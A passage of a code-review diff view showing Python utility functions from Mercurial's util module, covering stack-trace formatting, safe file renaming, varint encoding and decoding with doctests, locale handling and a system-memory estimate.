3498 results.append(hook(*args))
3497 return results
3499 return results
3498
3500
3499
3501
3500 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3502 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3501 """Yields lines for a nicely formatted stacktrace.
3503 """Yields lines for a nicely formatted stacktrace.
3502 Skips the 'skip' last entries, then return the last 'depth' entries.
3504 Skips the 'skip' last entries, then return the last 'depth' entries.
3503 Each file+linenumber is formatted according to fileline.
3505 Each file+linenumber is formatted according to fileline.
3504 Each line is formatted according to line.
3506 Each line is formatted according to line.
3505 If line is None, it yields:
3507 If line is None, it yields:
3506 length of longest filepath+line number,
3508 length of longest filepath+line number,
3507 filepath+linenumber,
3509 filepath+linenumber,
3508 function
3510 function
3509
3511
3510 Not be used in production code but very convenient while developing.
3512 Not be used in production code but very convenient while developing.
3511 """
3513 """
3512 entries = [
3514 entries = [
3513 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3515 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3514 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3516 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3515 ][-depth:]
3517 ][-depth:]
3516 if entries:
3518 if entries:
3517 fnmax = max(len(entry[0]) for entry in entries)
3519 fnmax = max(len(entry[0]) for entry in entries)
3518 for fnln, func in entries:
3520 for fnln, func in entries:
3519 if line is None:
3521 if line is None:
3520 yield (fnmax, fnln, func)
3522 yield (fnmax, fnln, func)
3521 else:
3523 else:
3522 yield line % (fnmax, fnln, func)
3524 yield line % (fnmax, fnln, func)
3523
3525
3524
3526
3525 def debugstacktrace(
3527 def debugstacktrace(
3526 msg=b'stacktrace',
3528 msg=b'stacktrace',
3527 skip=0,
3529 skip=0,
3528 f=procutil.stderr,
3530 f=procutil.stderr,
3529 otherf=procutil.stdout,
3531 otherf=procutil.stdout,
3530 depth=0,
3532 depth=0,
3531 prefix=b'',
3533 prefix=b'',
3532 ):
3534 ):
3533 """Writes a message to f (stderr) with a nicely formatted stacktrace.
3535 """Writes a message to f (stderr) with a nicely formatted stacktrace.
3534 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3536 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3535 By default it will flush stdout first.
3537 By default it will flush stdout first.
3536 It can be used everywhere and intentionally does not require an ui object.
3538 It can be used everywhere and intentionally does not require an ui object.
3537 Not be used in production code but very convenient while developing.
3539 Not be used in production code but very convenient while developing.
3538 """
3540 """
3539 if otherf:
3541 if otherf:
3540 otherf.flush()
3542 otherf.flush()
3541 f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
3543 f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
3542 for line in getstackframes(skip + 1, depth=depth):
3544 for line in getstackframes(skip + 1, depth=depth):
3543 f.write(prefix + line)
3545 f.write(prefix + line)
3544 f.flush()
3546 f.flush()
3545
3547
3546
3548
3547 # convenient shortcut
3549 # convenient shortcut
3548 dst = debugstacktrace
3550 dst = debugstacktrace
3549
3551
3550
3552
3551 def safename(f, tag, ctx, others=None):
3553 def safename(f, tag, ctx, others=None):
3552 """
3554 """
3553 Generate a name that it is safe to rename f to in the given context.
3555 Generate a name that it is safe to rename f to in the given context.
3554
3556
3555 f: filename to rename
3557 f: filename to rename
3556 tag: a string tag that will be included in the new name
3558 tag: a string tag that will be included in the new name
3557 ctx: a context, in which the new name must not exist
3559 ctx: a context, in which the new name must not exist
3558 others: a set of other filenames that the new name must not be in
3560 others: a set of other filenames that the new name must not be in
3559
3561
3560 Returns a file name of the form oldname~tag[~number] which does not exist
3562 Returns a file name of the form oldname~tag[~number] which does not exist
3561 in the provided context and is not in the set of other names.
3563 in the provided context and is not in the set of other names.
3562 """
3564 """
3563 if others is None:
3565 if others is None:
3564 others = set()
3566 others = set()
3565
3567
3566 fn = b'%s~%s' % (f, tag)
3568 fn = b'%s~%s' % (f, tag)
3567 if fn not in ctx and fn not in others:
3569 if fn not in ctx and fn not in others:
3568 return fn
3570 return fn
3569 for n in itertools.count(1):
3571 for n in itertools.count(1):
3570 fn = b'%s~%s~%s' % (f, tag, n)
3572 fn = b'%s~%s~%s' % (f, tag, n)
3571 if fn not in ctx and fn not in others:
3573 if fn not in ctx and fn not in others:
3572 return fn
3574 return fn
3573
3575
3574
3576
3575 def readexactly(stream, n):
3577 def readexactly(stream, n):
3576 '''read n bytes from stream.read and abort if less was available'''
3578 '''read n bytes from stream.read and abort if less was available'''
3577 s = stream.read(n)
3579 s = stream.read(n)
3578 if len(s) < n:
3580 if len(s) < n:
3579 raise error.Abort(
3581 raise error.Abort(
3580 _(b"stream ended unexpectedly (got %d bytes, expected %d)")
3582 _(b"stream ended unexpectedly (got %d bytes, expected %d)")
3581 % (len(s), n)
3583 % (len(s), n)
3582 )
3584 )
3583 return s
3585 return s
3584
3586
3585
3587
3586 def uvarintencode(value):
3588 def uvarintencode(value):
3587 """Encode an unsigned integer value to a varint.
3589 """Encode an unsigned integer value to a varint.
3588
3590
3589 A varint is a variable length integer of 1 or more bytes. Each byte
3591 A varint is a variable length integer of 1 or more bytes. Each byte
3590 except the last has the most significant bit set. The lower 7 bits of
3592 except the last has the most significant bit set. The lower 7 bits of
3591 each byte store the 2's complement representation, least significant group
3593 each byte store the 2's complement representation, least significant group
3592 first.
3594 first.
3593
3595
3594 >>> uvarintencode(0)
3596 >>> uvarintencode(0)
3595 '\\x00'
3597 '\\x00'
3596 >>> uvarintencode(1)
3598 >>> uvarintencode(1)
3597 '\\x01'
3599 '\\x01'
3598 >>> uvarintencode(127)
3600 >>> uvarintencode(127)
3599 '\\x7f'
3601 '\\x7f'
3600 >>> uvarintencode(1337)
3602 >>> uvarintencode(1337)
3601 '\\xb9\\n'
3603 '\\xb9\\n'
3602 >>> uvarintencode(65536)
3604 >>> uvarintencode(65536)
3603 '\\x80\\x80\\x04'
3605 '\\x80\\x80\\x04'
3604 >>> uvarintencode(-1)
3606 >>> uvarintencode(-1)
3605 Traceback (most recent call last):
3607 Traceback (most recent call last):
3606 ...
3608 ...
3607 ProgrammingError: negative value for uvarint: -1
3609 ProgrammingError: negative value for uvarint: -1
3608 """
3610 """
3609 if value < 0:
3611 if value < 0:
3610 raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
3612 raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
3611 bits = value & 0x7F
3613 bits = value & 0x7F
3612 value >>= 7
3614 value >>= 7
3613 bytes = []
3615 bytes = []
3614 while value:
3616 while value:
3615 bytes.append(pycompat.bytechr(0x80 | bits))
3617 bytes.append(pycompat.bytechr(0x80 | bits))
3616 bits = value & 0x7F
3618 bits = value & 0x7F
3617 value >>= 7
3619 value >>= 7
3618 bytes.append(pycompat.bytechr(bits))
3620 bytes.append(pycompat.bytechr(bits))
3619
3621
3620 return b''.join(bytes)
3622 return b''.join(bytes)
3621
3623
3622
3624
3623 def uvarintdecodestream(fh):
3625 def uvarintdecodestream(fh):
3624 """Decode an unsigned variable length integer from a stream.
3626 """Decode an unsigned variable length integer from a stream.
3625
3627
3626 The passed argument is anything that has a ``.read(N)`` method.
3628 The passed argument is anything that has a ``.read(N)`` method.
3627
3629
3628 >>> try:
3630 >>> try:
3629 ... from StringIO import StringIO as BytesIO
3631 ... from StringIO import StringIO as BytesIO
3630 ... except ImportError:
3632 ... except ImportError:
3631 ... from io import BytesIO
3633 ... from io import BytesIO
3632 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3634 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3633 0
3635 0
3634 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3636 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3635 1
3637 1
3636 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3638 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3637 127
3639 127
3638 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3640 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3639 1337
3641 1337
3640 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3642 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3641 65536
3643 65536
3642 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3644 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3643 Traceback (most recent call last):
3645 Traceback (most recent call last):
3644 ...
3646 ...
3645 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3647 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3646 """
3648 """
3647 result = 0
3649 result = 0
3648 shift = 0
3650 shift = 0
3649 while True:
3651 while True:
3650 byte = ord(readexactly(fh, 1))
3652 byte = ord(readexactly(fh, 1))
3651 result |= (byte & 0x7F) << shift
3653 result |= (byte & 0x7F) << shift
3652 if not (byte & 0x80):
3654 if not (byte & 0x80):
3653 return result
3655 return result
3654 shift += 7
3656 shift += 7
3655
3657
3656
3658
3657 # Passing the '' locale means that the locale should be set according to the
3659 # Passing the '' locale means that the locale should be set according to the
3658 # user settings (environment variables).
3660 # user settings (environment variables).
3659 # Python sometimes avoids setting the global locale settings. When interfacing
3661 # Python sometimes avoids setting the global locale settings. When interfacing
3660 # with C code (e.g. the curses module or the Subversion bindings), the global
3662 # with C code (e.g. the curses module or the Subversion bindings), the global
3661 # locale settings must be initialized correctly. Python 2 does not initialize
3663 # locale settings must be initialized correctly. Python 2 does not initialize
3662 # the global locale settings on interpreter startup. Python 3 sometimes
3664 # the global locale settings on interpreter startup. Python 3 sometimes
3663 # initializes LC_CTYPE, but not consistently at least on Windows. Therefore we
3665 # initializes LC_CTYPE, but not consistently at least on Windows. Therefore we
3664 # explicitly initialize it to get consistent behavior if it's not already
3666 # explicitly initialize it to get consistent behavior if it's not already
3665 # initialized. Since CPython commit 177d921c8c03d30daa32994362023f777624b10d,
3667 # initialized. Since CPython commit 177d921c8c03d30daa32994362023f777624b10d,
3666 # LC_CTYPE is always initialized. If we require Python 3.8+, we should re-check
3668 # LC_CTYPE is always initialized. If we require Python 3.8+, we should re-check
3667 # if we can remove this code.
3669 # if we can remove this code.
3668 @contextlib.contextmanager
3670 @contextlib.contextmanager
3669 def with_lc_ctype():
3671 def with_lc_ctype():
3670 oldloc = locale.setlocale(locale.LC_CTYPE, None)
3672 oldloc = locale.setlocale(locale.LC_CTYPE, None)
3671 if oldloc == 'C':
3673 if oldloc == 'C':
3672 try:
3674 try:
3673 try:
3675 try:
3674 locale.setlocale(locale.LC_CTYPE, '')
3676 locale.setlocale(locale.LC_CTYPE, '')
3675 except locale.Error:
3677 except locale.Error:
3676 # The likely case is that the locale from the environment
3678 # The likely case is that the locale from the environment
3677 # variables is unknown.
3679 # variables is unknown.
3678 pass
3680 pass
3679 yield
3681 yield
3680 finally:
3682 finally:
3681 locale.setlocale(locale.LC_CTYPE, oldloc)
3683 locale.setlocale(locale.LC_CTYPE, oldloc)
3682 else:
3684 else:
3683 yield
3685 yield
3684
3686
3685
3687
3686 def _estimatememory():
3688 def _estimatememory():
3687 # type: () -> Optional[int]
3689 # type: () -> Optional[int]
3688 """Provide an estimate for the available system memory in Bytes.
3690 """Provide an estimate for the available system memory in Bytes.
3689
3691
3690 If no estimate can be provided on the platform, returns None.
3692 If no estimate can be provided on the platform, returns None.
3691 """
3693 """
3692 if pycompat.sysplatform.startswith(b'win'):
3694 if pycompat.sysplatform.startswith(b'win'):
3693 # On Windows, use the GlobalMemoryStatusEx kernel function directly.
3695 # On Windows, use the GlobalMemoryStatusEx kernel function directly.
3694 from ctypes import c_long as DWORD, c_ulonglong as DWORDLONG
3696 from ctypes import c_long as DWORD, c_ulonglong as DWORDLONG
3695 from ctypes.wintypes import ( # pytype: disable=import-error
3697 from ctypes.wintypes import ( # pytype: disable=import-error
3696 Structure,
3698 Structure,
3697 byref,
3699 byref,
3698 sizeof,
3700 sizeof,
3699 windll,
3701 windll,
3700 )
3702 )
3701
3703
3702 class MEMORYSTATUSEX(Structure):
3704 class MEMORYSTATUSEX(Structure):
3703 _fields_ = [
3705 _fields_ = [
3704 ('dwLength', DWORD),
3706 ('dwLength', DWORD),
3705 ('dwMemoryLoad', DWORD),
3707 ('dwMemoryLoad', DWORD),
3706 ('ullTotalPhys', DWORDLONG),
3708 ('ullTotalPhys', DWORDLONG),
3707 ('ullAvailPhys', DWORDLONG),
3709 ('ullAvailPhys', DWORDLONG),
3708 ('ullTotalPageFile', DWORDLONG),
3710 ('ullTotalPageFile', DWORDLONG),
3709 ('ullAvailPageFile', DWORDLONG),
3711 ('ullAvailPageFile', DWORDLONG),
3710 ('ullTotalVirtual', DWORDLONG),
3712 ('ullTotalVirtual', DWORDLONG),
3711 ('ullAvailVirtual', DWORDLONG),
3713 ('ullAvailVirtual', DWORDLONG),
3712 ('ullExtendedVirtual', DWORDLONG),
3714 ('ullExtendedVirtual', DWORDLONG),
3713 ]
3715 ]
3714
3716
3715 x = MEMORYSTATUSEX()
3717 x = MEMORYSTATUSEX()
3716 x.dwLength = sizeof(x)
3718 x.dwLength = sizeof(x)
3717 windll.kernel32.GlobalMemoryStatusEx(byref(x))
3719 windll.kernel32.GlobalMemoryStatusEx(byref(x))
3718 return x.ullAvailPhys
3720 return x.ullAvailPhys
3719
3721
3720 # On newer Unix-like systems and Mac OSX, the sysconf interface
3722 # On newer Unix-like systems and Mac OSX, the sysconf interface
3721 # can be used. _SC_PAGE_SIZE is part of POSIX; _SC_PHYS_PAGES
3723 # can be used. _SC_PAGE_SIZE is part of POSIX; _SC_PHYS_PAGES
3722 # seems to be implemented on most systems.
3724 # seems to be implemented on most systems.
3723 try:
3725 try:
3724 pagesize = os.sysconf(os.sysconf_names['SC_PAGE_SIZE'])
3726 pagesize = os.sysconf(os.sysconf_names['SC_PAGE_SIZE'])
3725 pages = os.sysconf(os.sysconf_names['SC_PHYS_PAGES'])
3727 pages = os.sysconf(os.sysconf_names['SC_PHYS_PAGES'])
3726 return pagesize * pages
3728 return pagesize * pages
3727 except OSError: # sysconf can fail
3729 except OSError: # sysconf can fail
3728 pass
3730 pass
3729 except KeyError: # unknown parameter
3731 except KeyError: # unknown parameter
3730 pass
3732 pass
General Comments 0
You need to be logged in to leave comments. Login now